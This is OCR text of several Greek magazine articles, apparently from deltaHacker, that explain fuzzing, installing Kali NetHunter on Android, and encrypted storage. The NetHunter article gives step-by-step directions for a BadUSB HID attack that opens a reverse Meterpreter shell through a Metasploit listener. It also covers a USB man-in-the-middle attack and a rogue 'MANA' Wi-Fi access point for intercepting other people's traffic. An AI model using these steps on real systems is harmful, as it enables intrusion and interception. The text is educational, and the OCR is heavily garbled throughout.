1/15.8Κ, 4/65.8k, 6/78.2k 
34/254k, 0/0 
2876 B/931 (61.45% gain) 


Το περιβάλλον nou προβάλλει To afl, κατά τη διάρκεια των εργασιών TOU. 


δομένων και προσπαθεἰ να αναπαράγει το φαινόμενο, δηλαδή το κὀλλημα. Με αυτὸ 
τον τρόπο εντοπίζονται γρήγορα όλα τα σύνολα δεδομένων που "ενεργοποιούν" το 
συγκεκριμένο bug κι ο αναλυτἠς µπορεί να τα μελετήσει και να κατασκευάσει εὐκο- 
λα va σχετικὀ exploit. 


Τα πράγματα στη θέση τους 


Το fuzzing δεν αποτελεἰ ἑναν γρήγορο δρόμο προς τη δόξα. Η απόσταση μεταξὺ 
ενὸς οποιουδήποτε bug κι ενὸς exploitable bug εἶναι πολὺ μεγάλη. To fuzzing βοηθἁ 
στον εντοπισμὀ των bugs γενικότερα και δεν οδηγεὶ σίγουρα στην ανακάλυψη µιας 
κρίσιμης ευπάθειας. Μερικὲς δοκιμές που ἐγιναν πρόσφατα µε τη βοήθεια του afl 
ανέδειξαν προβλήματα σε εργαλεία που οὐτε καν θα υποψιαζόμασταν (strings, less, 
file, dpkg k.d.). Τα σχετικἁ bugs δεν απειλούν την ασφάλεια ενὸς συστήµατος. Όμως 
Eva σύνολο εργαλείων στο οποίο στηρἰζονται πάμπολλες διανομὲς Linux, πώς να το 
κάνουμε, πρέπει va 'ναι Ooo πιο σταθερὀὸ γἰνεται! Ακριβώς γι' αυτό, τον τελευταίο 
καιρὸ ἐχει ξεκινήσει µια προσπάθεια ano διάφορους ερευνητές ασφαλείας ava τον 
κόσμο, WOTE να υποβληθούν στη διαδικασία του fuzzing τα πιο δηµοφιλἠ εργαλεία 
και οι πιο διαδεδομένες βιβλιοθήκες του Linux. Αν θα θέλατε να συμβάλλετε κι εσεἰς 
σε αυτή την προσπάθεια, περάστε µια βόλτα ano τη σελίδα www.fuzzing-project.org: 
εκεὶ πραγματοποιείται ο συντονισμὸς της έρευνας. Ὅσοι πιστοί προσέλθετε. 
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Η επιθετικἠ πλευρὰ του Android! 


Το Kali Linux αποτελεί την αγαπημένη πλατφόρμα ὅλων ὅσοι ασχολούνται µε TO 
penetration testing. Τι θα λέγατε αν μπορούσατε ano αὐριο να το κουβαλάτε στην 
τσέπη σας; Πριν αρχίσετε va Χασκογελάτε σατανικἀ, πρέπει να σας πούμε ὅτι δεν 

τρέχει σε ὀλεςτις συσκευές Android. Ωστόσο, αν έχετε συσκευἠ Nexus ἡ αν εἶσαστε 
αρκετά φιλόδοξοι κι επίμονοι, ενδέχεται να εἶσαστε απὀ τους τυχερούς :D 


Η επιθετική πλευρά tou Android! 
ιά 


Δεν ξέρουμε αν το ἐχετε συνειδητοποιήσει, αλλά η εταιρεία Offensive Security μάς 
απασχολεἰ σχεδὸν σε κάθε τεύχος του deltaHacker. Πρόκειται για την εταιρεία που 
ανέπτυξε αρχικά τη διανομή Backtrack Linux κι αργότερα τον πολύ πετυχημένο διά- 
δοχὀ, το Kali Linux. Οι υπηρεσίες που προσφέρει η εταιρεία δεν περιορἰζονται στην 
ανάπτυξη και συντήρηση µιας διανομὴς Linux. H Offensive Security παρέχει μαθή- 
ματα στον τομέα του penetration testing, συμμετέχει στην ανάπτυξη του Metasploit, 
EVM διατηρεί την ιστοσελίδα Exploit Database. Σε γενικὲς γραμμὲς αποτελεὶ Eva 
δραστήριο παἰκτη στο χώρο της δικτυακἠς ασφάλειας, ο οποίος όμως μέχρι πρὀτινος 
παρουσίαζε µια σηµαντικἡ ἐλλειψη: Δεν εἶχε να προτείνει τίποτα για τις αγαπημένες 
μας φορητές συσκευὲς, που στηρἰζονται στο Android. Έτσι, στηριζόµασταν σε εφαρ- 
μογὲς ὁπως το zAnti 2, To dSploit κ.ἀ. Όλα αυτά άλλαξαν ἄρδην, όταν η Offensive 
Security παρουσίασε το Kali Linux NetHunter! Μη νομίζετε ὅτι πρὀκειται για μία 
ακόμα εφαρμογή. Το Kali Linux NetHunter αποτελεί µια τροποποιημένη εκδοχὴ του 
Android (custom ROM), η οποία περιέχει πληθώρα εργαλείων και scripts για εργασἰ- 
ες ὁπως το ασύρματο packet injection, η δημιουργία κακὀβουλων Access Points, οἱ 
επιθέσεις HID μέσω της ευπάθειας BadUSB και πολλὲς άλλες. Το μόνο κακὸ σε αυτή 
την ιστορἰα σχετίζεται µε τις υποστηριζόὀόμενες συσκευές. Όπως αντιλαμβάνεστε, 
εφόσον το NetHunter αποτελεὶ µια custom ROM δεν μπορεί να εγκατασταθεἰ σε 
οποιοδήποτε smartphone/tablet και οι συσκευές που επιτρέπουν κάτι τέτοιο εἶναι 
λίγες. O προσαρμµοσμένος πυρήνας στον οποίο στηρἰζεται το NetHunter µπορεί va 
τρέξει μόνο σε ορισμένες συσκευὲς Nexus της Google. Συγκεκριµένα, υποστηρὶ- 
ζονται τα μοντέλα των σειρὠν Nexus 5, Nexus 7 και Nexus 10, καθὼς και κάποια 
ακόµα που βρίσκονται σε πειραματικὀ στάδιο (Nexus 4, Oneplus One). Ευελπιστούμε 
τουλάχιστον OT! στο ἆμεσο μέλλον θα κυκλοφορήσουν εκδοχὲς του NetHunter nou 
θα τρέχουν και στις νεότερες συσκευές Nexus. 


Εγκατάσταση του NetHunter 


Πα όσους διαθέτουν συμβατή συσκευή, η εγκατάσταση του Kali NetHunter εἶναι 
αρκετά εὐκολη. Ας ρίξουμε µια ματιὰ στη διαδικασία. Κατ' αρχάς, αυτό που χρεια- 
ζόμαστε εἶναι Eva σύστημα µε Windows καθὼς και ο installer του NetHunter, που 
μπορούμε να κατεβάσουμε and το http://images.kali.org/Kali_v1.0.9.sfx.exe. Αφού 
εγκαταστήσουµε το συγκεκριμένο πακέτο, θα ξεκινήσει αυτόματα η εκτέλεση του 
λεγόμενου NetHunter Installer. Στο πρώτο βήμα της εγκατάστασης το πρόγραμμα 
θα µας προτείνει να εγκαταστήσουμµε τους κατάλληλους drivers ano τη Google, οι 
οποίοι απαιτούνται για την πρόσβαση στις συσκευὲς Nexus. Στο δεύτερο βήμα θα 
εμφανιστεί Eva μενού drop-down, ano το οποίο πρέπει να επιλέξουμε τη συσκευἠ 
μας. Στο τρίτο βήμα το πρὀγραµµα εμφανίζει τη λίστα µε τα προγράμματα και τις 
ενημερώσεις που πρέπει να ληφθούν ano το δίκτυο. Αφού πατήσουμε το σχετικὀ 
κουμπί και περιμένουμε να κατέβουν τα απαραίτητα πακέτα, μπορούμε να προχωρήἠ- 
σουµε στο επόμενο βήμα. And εδὠ και πἐρα δεν θα χρειαστεἰ η δικἠ µας παρέµβα- 
ση. Ακολουθούν τρία βήματα κατὰ τα οποία ξεκλειδώνεται η συσκευἠ, εγκαθἰσταται 
το stock Android, προστίθενται οι εφαρμογές που απαρτίζουν το NetHunter και η 
συσκευἠ γίνεται rooted. Με το τέλος της διαδικασίας, η συσκευἠ εἶναι ἐτοιμη για 
penetration testing! 


Στη δικἠ µας περίπτωση, πάντως, τα πράγματα δεν ἦταν τόσο απλά. Εμείς βλέπε- 
τε δεν εἰχαμε κάποια απὸ τις συσκευὲς που υποστηρίζονται πλήρως. Διαθέταμε το 


Oneplus One και ἡμασταν υποχρεωμένοι να χτίσουμε το NetHunter ano τον πηγαίο 
κὠδικα και να το εγκαταστἠσουµε χειροκίνητα. Πα το πρὠτο σκέλος της εργασίας 
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Programs 
M, NetHunter Installer v1.0.9 by Offensive Security 
N 
Welcome To Kali Linux NetHunter Installer! 
Nenonen This program will walk you through the installation 
bhalg 


Press ‘Next'to begin. 


7] Auto-update on start. 


—— πα” Check for updates now. 


Next>> 
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Progratns) 
‘A NetHunter Installer v1.0.9 by Offensive Security 
N 
Step #1 - Driver Configuration: 
Nenonen if you have not done so already. you need to have divers installed. 
Installer, 
To install, click the “Install Drivers" button below. 
With the drivers installed, please hit "Test Drivers below 
If you do have a failure please check to see f the device reads "Connected as a 
στ media device”. f so. uncheck the "Media Device (MTP)" option as that often 
Screenshot 


corrects that problem. 
——— απ Install Drivers 


Test Drivers 


Programs DH] 
M NetHunter Installer v1.0.9 by Offensive Security 
N 
Step #2 - Device Selection: 
Nenonen Select the device you have: 
Installer 


Nexus 5 (LG D820, D821) 


<<Back Next>> 


Factory Image Downloader — 


10 : 


κα 
3 


μπορω. Bekia Downloading: hammerhead ktu84ptactory-35ea0277 192 

νε he Download Status: 

ql h / Hashcheck: 

Extraction 
Programs DHJ 
M, NetHunter Installer v1.0.9 by Offensive Security 
N 
Step #3 - Download Files: 

NetHunter: File Download Status: 

Installer 


Factory Package: 
Modified Boot img 
TWRP Recovery 
Chainfre SuperSU: 
Kali Linux NetHunter: Not Present - Need to download. 


Not Present - Need to download. 
Not Present - Need to download. 
Not Present - Need to download. 


Ready! [v2 


unter <<Back 


+ 


x 
DO & NS 
H εγκατάσταση του KaliNethunter στις υποστηριζόµενες 

OUOKEUEG εἶναι αρκετά απλή. To µόνο που έχουμε να κάνουμε 
εἶναι va κατεβάσουµε τον απαραίτητο installer και να ξεκινή- 


σουµε τη διαδικασία. 
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Available] - Super SU-v2.02.zip 
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-την προετοιμασία του ROM µε το NetHunter- χρειαστήκαμε Eva σύστημα µε την 
64µπιτη εκδοχἠ Tou Kali Linux και περὶ τα 10GB διαθέσιμου αποθηκευτικού χώρου. 
Επιπρόσθετα, επειδἠ χτἰίσαμε το NetHunter πάνω στην enionun ROM του Oneplus 
One, φροντίσαμε πρὠτα να την κατεβάσουμµε ano εδώ: http://d-h.st/HuG. 


H διαδικασία ξεκίνησε pe TH λήψη του πηγαἰου κὠδικατου NetHunter. Έτσι, ανοίξαμε 
Èva TEPHATIKO και εκτελέσαµε τις παρακάτω EVTOAEG: 


$ mkdir ~/arm-stuff 

$ cd ~/arm-stuff 

$ git clone https://github.com/offensive-security/gcc-arm-linux-gnueabihf-4.7 
$ export PATH=${PATH}:/root/arm-stuff/gcc-arm-linux-gnueabihf-4.7/bin 

$ git clone https://github.com/1l@rdg3x/kali-nethunter 

$ cd ~/arm-stuff/kali-nethunter 

$ ./build-deps.sh 


Όπως βλέπετε δημιουργήσαμε ¿vav "κατάλογο εργασίας" µε TO ὄνομα arm-stuff, uE- 
ταβήκαμε σ' αυτὸν και κατεβάσαμε τον nnyaio κὠδικατου NetHunter ano το σχετικὸ 
Github repository, στο https://github.com/offensive-security/kali-nethunter. Όταν 
ολοκληρώθηκε ο συγχρονισμὸς του repository παρατηρήσαμε OT! μεταξύ ἄλλων εἰχε 
δημιουργηθεἰ και ἑνας κατάλογος µε το ὀνομα PLACE_ROM_HERE. Εκεἰ µέσα Tono- 
θετήσαμε το επίσημο ROM της συσκευἠς µας. Αμέσως μετὰ εκτελἐσαµε το script 
ονόματι androidmenu: 


$ ./androidmenu.sh 


Ακολουθώνταςτις οδηγίες eni της οθόνης, µέσα σε λίγα λεπτά αποκτἠσαµε το apxEio 
KaliROM.zip. Προφανώς, το συγκεκριμένο πακέτο αποτελεἰ το custom ROM µε To 
Kali NetHunter. H διαδικασία nou ακολουθἠσαµε ως εδώ θα μπορούσε να εφαρµο- 
στεἰ για οποιαδήποτε συσκευἠ - ενδεχομένως και για κἄποια που δεν υποστηρίζεται 
enionua! Στη συνέχεια έπρεπε να εγκαταστήσουμε το νέο ROM, ὁπως επίσης και την 
κατάλληλη εκδοχἠ του πυρήνα. Πα το Oneplus One προσφέρεται ¿vag ἑτοιμος nu- 
ρήνας µε ὁλους τους απαραίτητους drivers για τα περιφερειακά της συσκευἠς, τον 
οποίο μπορούμε να κατεβάσουµε απὀ εδώ: https://github.com/1@rdg3x/AK-OnePone. 
Πα την εγκατάσταση των δύο αρχείων πρέπει να χρησιμοποιηθεί το TWRP recovery. 


Εγκατάσταση του TWRP recovery 


Κάπου εδώ ξεκινά το δεύτερο σκέλος της εργασίας για την εγκατάσταση του 
NetHunter στο Oneplus One. Όπως εἰπαμε, σε αυτό το στάδιο θα χρειαστούμµε το 
TWRP Recovery κι επομένως θα πρέπει va το εγκαταστήσουµε στη συσκευἠ. Π' αυτή 
την εργασία χρειαζόμαστε τα ακὀλουθα σύνεργα: 


1. ‘Eva σύστημα µε Windows 7 ἡ νεότερο 


2. Ολόκληρο To Android SDK (http://developer.android.com/sdk/index. 
html#download) ἡ ἑνα πακετάκι µε τα απολύτως απαραίτητα αρχεία 
(http://d-h.st/@8w) 


3. Το πακέτο µε το TWRP recovery (http://techerrata.com/browse/twrp2/bacon) 


4. Τους γενικοὺς drivers για συσκευὲς στην κατάσταση fastboot 
(www. koushikdutta.com/post/universal-adb-driver) 


31 


VHA@KER 


ο ο HW 


Πρέπει να τονίσουμε ὁτι η εγκατάσταση του TWRP recovery προὐποθέτει το ξεκλεἰ- 
wpa του Bootloader της συσκευἠς, γεγονὸς που συνεπάγεται τη διαγραφἠἡ όλων 
των δεδοµένων. Π' αυτό το λὀγο ξεκινήσαμε naipvovtac ἑνα πλήρες backup, µε pia 
εφαρµογἡ ὁπως το Titanium Backup. Αμέσως μετά εγκαταστήσαµμε στα Windows 
τους drivers nou εἰχαμε κατεβάσει, ενώ αποσυμµπιἐσαµε τα αρχεία Tou Android SDK 
σε Evav κατάλογο µε το ὀνομα platform-tools. Σε αυτόν τον κατάλογο αντιγρἀψαμµε 
και το πακέτο µε TO TWRP recovery image, αφού προηγουμένως το μετονομάσαμε 
σε "recovery.img". Ακολούθως ανοἰξαμε το command line των Windows (cmd) µε δι- 
καιώματα administrator και µεταβήκαμε στον προαναφερθέντα κατάλογο (platform- 
tools). Σειρἁ εἶχε η προετοιμασία και η σύνδεση της συσκευἠς. Πα το σκοπὀ AUTÒ 
την απενεργοποιἠσαµε και την ενεργοποιἠσαµε εκ νέου, κρατώντας πατημένα τα 
κουμπιά power κι εκεὶνο της αὐξησης της ἑντασης του ἠχου. Το πάτημα των πλἠ- 
κτρων πρέπει να διαρκέσει EWC ὁτου εμφανιστεί στην οθὀνη η ἐνδειξη fastboot. 
Αμέσως μετά συνδέσαµμε τη συσκευἠ στον υπολογιστή µέσω USB και ξεκλειδώσαμε 
τον Bootloader εκτελώντας τα ακὀλουθα: 


fastboot oem unlock 
fastboot reboot 


H συσκευἠ µας πραγµατοποἱησε αυτόματα µια επανεκκίνηση κι εμεὶς φροντίσαμε va 
μπούμε πάλι σε fastboot mode, κρατώντας πατηµένα τα πλήκτρα που αναφέραμε 
προηγουμένως. Πλέον ἡμασταν ἑτοιμοι να εγκαταστήσουµε το TWRP recovery: 


fastboot flash recovery recovery. img 
fastboot reboot 


Μετὰ κι ano auT την επανεκκίνηση της συσκευἠς, το TWRP recovery eixe εγκατα- 
σταθεἰ µε επιτυχία. Μάλιστα, για να µην αντικατασταθεἰ ano τις HEAAOVTIKEG ενηµε- 
ρώσεις της συσκευἠς, µεταβήκαμε στην περιοχἠ Developer Options των ρυθμίσεων 
και φροντἰσαμε να απενεργοποιἠσουµε το "Update recovery with system updates". 
Τέλος, για να μπούμε στο recovery mode του Oneplus One και να ολοκληρώσουμε 
την εγκατάσταση NetHunter, χρειάστηκε να το απενεργοποιήσουμµε και να το ενερ- 
γοποιήσουμε ξανά. Αυτή τη φορὰ, όμως, κρατούσαμε πατημένα τα πλῆκτρα power 
και αυτὸ της μείωσης της ἐντασης του ἠχου. Από τις επιλογὲς του TWRP recovery 
µεταφέραμε το πακέτο µε TO ROM Tou NetHunter ὁπως επἰσης και τον πυρήνα, στον 
αποθηκευτικὀ χώρο της συσκευής. Ακολούθως πραγµατοποιἠσαµε µια ακόμα ena- 
νεκκίνηση, φροντίζοντας va εισέλθουμε NGAI στο TWRP recovery. Αυτή τη φορά 
πραγματοποιήσαμε τη διαγραφή των dalvik cache, cache και system και ολοκλη- 
ρώσαμε (επιτέλους) την εργασία µας, εγκαθιστώντας το Custom ROM και το νέο 
πυρήνα. Πραγματοποιώντας µια τελευταία επανεκκίνηση, η συσκευή µας φόρτωσε 
το NetHunter και ήμασταν ἑτοιμοι να ξεκινήσουμε. 


Χειρισμός του NetHunter 


Το Kali NetHunter, εκτὸς ano τις εφαρμογὲς τρίτων που µπορεί να τρέξει (π.χ., bcmon 
για monitor mode της ασύρματης κάρτας δικτύου), διαθέτει κι αρκετὲς δικὲς του. 
Στην "κεντρική σελἰδα" του λειτουργικού, στο λεγόμενο app drawer, συναντάμε Eva 
EIKOVIOIO µε TO σύμβολο του Kali Linux και το ὀνομα Kali Launcher. Πρόκειται για την 
περιοχἠ ano την οποία ενεργοποιούνται οι βασικὲς λειτουργίες του NetHunter. Αν 
την επισκεφτούµε θα βρούμε έξι επιλογές, οι δύο απὀ τις οποίες παρουσιάζουν ιδιαἰ- 
Tepo ενδιαφἑρον. Πρόκειται γι’ αυτὲς που αφορούν στην εκκίνηση και στον τερµα- 
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ώμο” 


& Kali Launcher 


Launch Kali Shell in Terminal 


Launch Kali Menu in Terminal 


Shutdown Kali 


Launch Wifite 


Start Webserver 


Stop Webserver 


Η εφαρµογή Kali Launcher αποτελεί την περιοχή 
ano την οποία μπορούμε να ξεκινήσουμε τις πιο 
σημαντικἐς λειτουργίες του NetHunter. Μεταξύ 
ἄλλων, ano εκεί μπορούμε να τρέξουµε TOV προς- 
γκατεστημένο Terminal Emulator, όπως επίσης va 
ενεργοποιήσουµε και να ενεργοποιήσουµε τον web 
server στον οποίο στηρίζεται το NetHunter Web 
Panel. 


Επίθεση HID και PowerSploit 


τισμὸ TOU ενσωματωμένου web server. 
Πατώντας το "Start Webserver" evepyo- 
ποιεῖται ἑνας HTTP server κι ανοίγει au- 
τόµατα Evac web browser, ο οποίος μάς 
μεταφέρει στο λεγόμενο NetHunter Web 
Panel. Σημειώστε ὁτι την πρὠτη φορά 
που θα εκκινήσουµε τον web server ev- 
δέχεται να παρατηρήσουμε µια καθυ- 
στέρηση στην απὀκριση των πλήκτρων. 
Αυτό εἶναι φυσιολογικὸ και δεν πρέπει 
να σας προβληματίσει. Επίσης, στην ne- 
ρἰπτωση που ζητηθούν δικαιώματα root 
ano την εφαρµογή, εἶναι απαραίτητο να 
τα δώσουμε. O εργοστασιακὀς κωδικὀς 
για το χρήστη root εἶναι το "toor" (χω- 
pic τα εισαγωγικἀ). Ano το Web Panel, 
λοιπὸν, μπορούμε να πραγματοποιήσου- 
µε τις επιθέσεις που υποστηρίζει το Kali 
NetHunter. Πιο συγκεκριµένα, μπορούμε 
να ενεργοποιήσουµε ἡ va απενεργοποι- 
ἡσουμε τις υπηρεσίες που απαιτούνται 
για την διεξαγωγἠ διαφόρων επιθέσεων. 
Πριν ολοκληρώσουμετη σύντομη παρου- 
oiaon του περιβάλλοντος Tou NetHunter, 
οφείλουμε να επιστήσουµε την προσοχἠ 
σας σε μία προειδοποίηση της Offensive 
Security. Παρόλο που ο web server του 
NetHunter ακούει μόνο στη διεύθυνση 
του localhost, πρέπει να δρούμε µε npo- 
σοχἠ και να τον απενεργοποιούμε όταν 
ολοκληρώσουμετις εργασἰες µας. Αυτή η 
πρακτικἠ κρίνεται αναγκαία, γιατί ο KO- 
δικας του NetHunter Web Panel ενδέχε- 
ται να παρουσιάσει ευπάθειες και να γίνει 
τρωτόὀς σε επιθέσεις CSRF. Ας αφήσουμε 
όμως TN θεωρία και ας δούµε μερικὲς ENI- 
θέσεις που μπορούμε να πραγματοποιἠ- 
coupe µε τη βοήθεια της πλατφόρμας. 


Στο τεύχος 037 του deltaHacker εἰχαμε μιλήσει αναλυτικἁ για την ευπάθεια BadUSB 
και για τις επιθέσεις που καθιστά δυνατές. Δεν θα ἦταν πιο βολικὀ av εξαπολύαμε 
µια τέτοια επίθεση ano To SmartPhone, που σε τελικἠ ανάλυση βρίσκεται πάντοτε 
στην τσέπη µας; Μια κατηγορἰα επιθέσεων που στηρἰζονται στην ευπάθεια BadUSB 
ἐχει το ὀνομα HID (Human Interface Device). Σε αυτὲς τις επιθέσεις, όταν η συσκευἠ 
συνδέεται σε κἄποιον υπολογιστή παρουσιάζεται σαν πληκτρολόγιο και στέλνει µια 
σειρἁ προκαθορισµένων keystrokes. Οι επιθέσεις αυτού του τύπου δεν ανιχνεύονται 
ano κανένα antivirus και μπορούν να εκτελεστούν σε KOBE σύστημα που διαθέτει 


θύρες USB! 
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Στην επίθεση nou θα δούμε, η συσκευἠ 
που παρουσιάζεται ως πληκτρολόγιο αξι- 
127.0.0.1:8080 mM : onolei το αγαπημένο µας Metasploit και 
επιδιώκει να αποκτήσει τον ἐλεγχο του 
ξένου μηχανήματος. Η συγκεκριμένη 
Nethunter Web Panel επίθεση του Kali NetHunter ονομάζεται 
PowerSploit και προὐποθέτει την ὑπαρξη 
ενὸς web server, για τη φιλοξενία του 
payload. Επομένως, το πρὠτο βήμα εἰναι 
να μεταβούμε στο Kali Service Control 
του Web Panel και να ξεκινήσουμε την 
υπηρεσία Apache server. Στη συνέχεια, 
πάλι ano το NetHunter Web Panel, ενερ- 
γοποιούμε την επιλογἡ HID Keyboard 
Attack και ano τη λίστα µε τα διαθέσι- 
μα payload επιλέγουμε το PowerSploit. 
Κάπως έτσι θα εμφανιστούν οι ρυθμίσεις 
της συγκεκριμένης επίθεσης. Εκεἰ πρὲ- 
πει να δώσουμε τη διεύθυνση IP και τη 
θύρα που θα χρησιμοποιήσουμε apyo- 
τερα στο Metasploit, για τη δηµιουργία 
ενὸς listener. Στο πεδίο URL δίνουμε τη 
διεύθυνση IP της συσκευής µας, αφού 
σε αυτήν εκτελείται ο web server που 
προσφέρει το PowerSploit payload. Τὲ- 
λος, επιλέγουμε το Payload που θέλουμε 
να χρησιμοποιήσουμε στο Metasploit και 
πατάμε το κουμπί Update. 


— Μετὰ ano τα παραπάνω ακολουθεί n õn- 
μιουργία ενὸς κατάλληλου listener στο 

Το NetHunter Web Panel επιτρέπει την εύκολη Metasploit. Πα αυτο Το κομματι της δου- 
διαχείριση των υπηρεσιών, που απαιτούνται για τη λειὰς θα χρειαστούμε vav υπολογιστή 
διεξαγωγή των διαφόρων επιθέσεων. µε το Kali Linux. Εκεἰ πρέπει να εκτελὲ- 


σουµε τα ακόλουθα: 
root@kali:~# msfconsole 
msf > use exploit/multi/handler 
msf exploit(handler) > 


Με αυτὀν τον τρόπο εκκινούμε το msfconsole και χρησιμοποιούμε TO module exploit/ 
multi/handler. Αμέσως μετά πρέπει να θέσουμε το payload που επιλέξαμε και στις 
ρυθμίσεις του PowerSploit: 


msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_ https 
PAYLOAD => windows/meterpreter/reverse https 


Τέλος, δίνουμε στις παραμέτρους LHOST και LPORT τις τιμὲς που εἰχαμε δώσει στο 
PowerSploit και ενεργοποιούµε Tov listener: 


msf exploit(handler) > msf exploit(handler) > set LHOST 192.168.1.102 
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LHOST => 192.168.1.102 

msf exploit(handler) > set LPORT 4444 
LPORT => 443 

msf exploit(handler) > exploit 


Ano €0@ και πέρα, το μόνο που ἐχουμε να κάνουμε εἶναι να συνδἐσουµε τη συσκευἠ 
µε το NetHunter στο μηχάνημα στὀχο και να περιμένουμε λίγα δευτερόλεπτα. H eni- 
θεση θα πραγμµατοποιηθεἰ μόλις πατήσουμε το κουμπί Execute! Στην περίπτωση που 
πάνε όλα καλά, το μηχάνημα στόχος θα συνδεθεἰ στον σύστημα που τρέχει ο listener 
και θα δηµιουργηθεἰ Eva meterpeter session. 


Επιθέσεις ΜΙΤΜ µέσω BadUSB 


Auth τη φορά θα χρησιμοποιήσουμε την ευπάθεια BadUSB για να πραγµατοποιἠ- 
coupe µια επίθεση Man in The Middle. Eni της ουσίας, κάθε φορά που θα συνδέουµε 
τη συσκευἠ µας µέσω USB θα εμφανίζεται ως Eva network interface. Από εκεὶ θα 
διέρχεται OAN η δικτυακή κίνηση του μηχανήματος-στὀχου κι ETO! θα ἐχουμε τη 
δυνατότητα να την αναλύσουμε. Πα va πραγµατοποιήσουµε αυτἠ την επίθεση µετα- 
βαΐνουμε στο NetHunter Web Panel και επιλέγουμε το BadUSB ΜΙΤΜ Attack. Εκεἰ, To 
μόνο που EXOUHE να κάνουμε εἶναι να επιλέξουμε το interface που θέλουμε va χρησι- 
μοποιηθεἰ για τη διεξαγωγἠ της επίθεσης και να πατήσουµε το κουμπἰ Start BadUSB 
Attack. Στην περίπτωση που χρησιμοποιούμε µια συσκευἠ µε παραπάνω ano µια 
θύρες USB, το σύστημα θα παρουσιάσει δύο υποψήφια interfaces. Για να βρούμε 
ποιο χρειαζόμαστε αρκεἰ να τρἐξουµε το προεγκατεστημένο Terminal Emulator και 
να εκτελέσουµε το iftop. 


© i i 


Nethunter Web Panel 


IP Address: 


Port: 


Payload: 


Admin 


ΟΙ ρυθμίσεις που παρέχει το NetHunter Web Panel, κατά την πραγµατο- 
ποίηση µιας επίθεσης µε το PowerSploit. 
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Κακόβουλα ασύρματα δίκτυα 


Στο Web Panel του NetHunter θα βρούμε και την επιλογἠ MANA Evil Access Point. 
Αυτὸς ο μηχανισμὸς δημιουργεί Eva κακόβουλο ασύρματο δίκτυο, στο οποίο µπορεί 
να συνδεθεἰ οποιοσδήποτε. Ταυτόχρονα, το ἴδιο δίκτυο επιτρέπει σε εμάς να πραγµα- 
τοποιούµε επιθέσεις ΜΙΤΜ σε οποιοδήποτε μέλος του! Οι επιλογἐς που παρέχονται σε 
αυτή την επίθεση αφορούν τα στοιχεία του ασύρματου δικτύου που θα δημιουργηθεἰ 
(SSID, wifi channel, access point MAC κ.ο.κ.). Όπως αντιλαμβάνεστε, οι συγκεκρι- 
μένες ρυθμίσεις δεν επηρεάζουν τη λειτουργικότητα της ὁλης επίθεσης και για µια 
σύντομη δοκιμή δεν υπάρχει κανένας λὀγος για να τις τροποποιήσουμε. Πα αυτὴ την 
επίθεση θα χρειαστούµε µια εξωτερικἠ κάρτα ασύρματης δικτύωσης (802.11), την 
οποία πρέπει να συνδέσουµε στη συσκευἠ µέσω ενὸς καλωδίου OTG (θηλυκὀ USB / 
αρσενικὀ microUSB). H επίθεση ξεκινά πατώντας το κουμπί Start MANA. Αν κάποια 
συσκευἠ κάνει το λάθος να συνδεθεἰ στο ασύρματο ὄϊκτυο-παγίδα, η δικτυακἠ κἰνη- 
ση θα διέρχεται ano τη συσκευἠ µας και θα μπορούμε να την υποκλέψουμµε ἀνετα. 
H επιτυχία της συγκεκριμένης επίθεσης στηρίζεται στην αληθοφάνεια και στην εµπι- 
στοσύνη που εκπἐµπουν τα στοιχεία του ασύρματου δικτύου µας. 


Μακάριοι οι Nexus ἐχοντες! 


Κάθε μέρα καταλαβαίνουμε ὁλο και περισσότερο πόσο ισχυρὀ ONAO μπορεὶ να γίνει 
το Android. Σε αυτὸ το άρθρο παρουσιάσαµε Eva ακόµα εργαλείο για penetration 
testing. Μη νομίζετε όμως ὁτι TO οπλοστάσιὀ µας αποτελεἰται μόνο ano ὁσα αναφέ- 
pape. Οἱ δυνατότητες του Kali NetHunter εἶναι συγκρίσιμες µε εκείνες του Kali Linux 
και θα μπορούσαμε να τις χαρακτηρίσουµε αναρίθμητες! Ὅσοι διαθέτουν κάποια 
συσκευἠ Nexus θα πρέπει να νιώθουν τυχεροί που ¿xouv στη διάθεση τους Eva τόσο 
ισχυρό εργαλείο. Οι υπόλοιποι μπορούμε να κάνουμε υπομονή, ως την εμφάνιση 
παραλλαγμένων εκδοχών του NetHunter nou θα τρέχουν σε διαφορετικὲς συσκευέἑς. 
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Κρυπτογραφηµένα αποθηκευτικά μέσα 


Κρυπτογραφημένα αποβηκευτικά μέσα 
“μμ 


Δεν ξέρουμε για σας, αλλά εμεὶς έχουμε μυστικά και δεν το κρύβουμε. O λὀγος που 
το δηλώνουμε ευθαρσώς, εἶναι γιατὶ ἐχουµμε βαρεθεί να προσπαθούμε να αποδεἰξου- 
µε το αυτονόητο. Θεωρούμε φυσιολογικὀ το να EXE! κανεὶς μυστικά, ενώ η δυνα- 
τότητα προστασίας των μυστικὠν απὀ οποιονδήποτε -ακόμη κι ano τις Αρχὲς που 
"πολεμούν την τροµοκρατία"- αποτελεἰ βασικὀ δικαίωμα για όλους. Παΐρνοντας ως 
δεδομένο αυτή την ἀποψη, θα προσπεράσουμε τις περιττὲς αναλύσεις γύρω απὀ το 
"γιατί" και θα εστιάσουµε στο "πώς". H προστασία των δεδοµένων αποτελεἰ εξαιρε- 
TIKG σύνθετο ζήτημα κι ἐχουμε εξετάσει διάφορες πτυχὲς του, μελετώντας μεθόδους 
για την κρυπτογράφηση των μηνυμάτων, την ανώνυμη περιήγηση στο διαδίκτυο 
κ.λπ. Αυτή τη φορά θα δούμε πώς μπορούμε να εξασφαλίσουµε τη μυστικότητα των 
αποθηκευμένων δεδομένων. Θα εξετάσουμε τους σχετικούς μηχανισμούς κρυπτο- 
γράφησης και φυσικά θα εργαστούμε στο Linux, που αποτελεἰ το ιδανικὀ περιβάλλον 
για την επίτευξη του σκοπού µας. 


Διασημότητα του παρελθὀντος 


Μια λύση στο πρόβλημα που εξετάζουμε, περισσότερο γνωστή στους παλιούς χρή- 
στες, βασίζεται στο περίφημο EncFS (Encrypted File System). Η υποστήριξη για το 


[1] Partition disks 


Οι σύγχρονες διανομές Linux επιτρέπουν την εγκατάσταση TOU συστήµατος σε Eva πλήρως 
κρυπτογραφημένο αποθηκευτικὀ μέσο. Πα να πετύχουν κάτι τέτοιο, κρυπτογραφούν µια 
κατάτμηση µε το LUKS και δημιουργούν Eva αντίστοιχο block device µε τη βοήθεια του dm- 
crypt. Μέσα στο εν λόγω block device δημιουργούν éva συγκρότηµα κατατµήσεων (volume 
group) µε τη βοήθεια του LVM. To volume group αποτελείται ano επιµέρους logical volumes, 
καθένα ano τα οποία αντιστοιχίζεται σε διαμέρισμα του συστήµατος. Όπως βλέπετε, εκτός 
